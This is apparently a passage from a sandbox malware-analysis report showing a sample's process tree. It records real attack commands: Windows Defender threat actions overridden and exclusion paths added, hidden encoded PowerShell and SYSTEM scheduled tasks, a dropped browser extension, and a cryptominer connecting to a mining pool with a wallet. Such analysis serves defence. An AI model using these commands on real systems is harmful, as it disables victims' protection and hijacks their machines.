/reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                          2⤵
                                          • Drops file in System32 directory
                                          • System Location Discovery: System Language Discovery
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3568
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:5648
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3160
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:2012
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:5692
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5684
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:5664
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:2404
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6000
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:6992
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5864
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:5604
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3204
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:452
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:5368
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:5640
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5408
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3332
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:2832
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:6332
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:6404
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:6468
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:6528
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:6596
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:6660
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:6720
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:6788
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:6896
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:6956
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:7032
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPhKexxKHjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPhKexxKHjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEIgHLylU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEIgHLylU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbgYcEcZyQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbgYcEcZyQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJTkDUsLcXSLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJTkDUsLcXSLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aiawRKtoMjRxlKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aiawRKtoMjRxlKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EfDQwjblbGMYTvUW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EfDQwjblbGMYTvUW\" /t REG_DWORD /d 0 /reg:64;"
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Modifies data under HKEY_USERS
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:7108
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:32
                                                                                  3⤵
                                                                                    PID:6848
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:32
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:6996
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:1772
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEIgHLylU" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:5240
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEIgHLylU" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:7136
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2460
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR" /t REG_DWORD /d 0 /reg:64
                                                                                          3⤵
                                                                                            PID:4996
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbgYcEcZyQUn" /t REG_DWORD /d 0 /reg:32
                                                                                            3⤵
                                                                                              PID:5940
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbgYcEcZyQUn" /t REG_DWORD /d 0 /reg:64
                                                                                              3⤵
                                                                                                PID:5176
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJTkDUsLcXSLC" /t REG_DWORD /d 0 /reg:32
                                                                                                3⤵
                                                                                                  PID:5928
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJTkDUsLcXSLC" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:5556
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aiawRKtoMjRxlKVB /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:6032
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aiawRKtoMjRxlKVB /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:3928
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:7144
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:6380
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5564
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:6212
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:964
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5412
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EfDQwjblbGMYTvUW /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                          PID:2428
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EfDQwjblbGMYTvUW /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:1496
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "gZZVMTumM" /SC once /ST 06:09:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                        2⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:1544
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "gZZVMTumM"
                                                                                                        2⤵
                                                                                                          PID:5976
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "gZZVMTumM"
                                                                                                          2⤵
                                                                                                            PID:4212
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /CREATE /TN "HUfdpCtBFdwYOuoar" /SC once /ST 05:54:03 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EfDQwjblbGMYTvUW\iofAWDeBylnRwgX\EdynMjJ.exe\" Bn /bUyldidjM 385107 /S" /V1 /F
                                                                                                            2⤵
                                                                                                            • Drops file in Windows directory
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:1596
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /run /I /tn "HUfdpCtBFdwYOuoar"
                                                                                                            2⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:6828
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 640
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4008
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                          1⤵
                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Executes dropped EXE
                                                                                                          • Identifies Wine through registry keys
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:8
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1924
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          1⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:5416
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            2⤵
                                                                                                              PID:4052
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                            1⤵
                                                                                                              PID:6456
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                              1⤵
                                                                                                                PID:6400
                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                1⤵
                                                                                                                  PID:4152
                                                                                                                • C:\Users\Admin\AppData\Roaming\Guid\TypeId.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Guid\TypeId.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:3216
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                                                                                                    2⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:1992
                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50
                                                                                                                      3⤵
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      PID:5404
                                                                                                                • C:\Windows\Temp\EfDQwjblbGMYTvUW\iofAWDeBylnRwgX\EdynMjJ.exe
                                                                                                                  C:\Windows\Temp\EfDQwjblbGMYTvUW\iofAWDeBylnRwgX\EdynMjJ.exe Bn /bUyldidjM 385107 /S
                                                                                                                  1⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops Chrome extension
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:6040
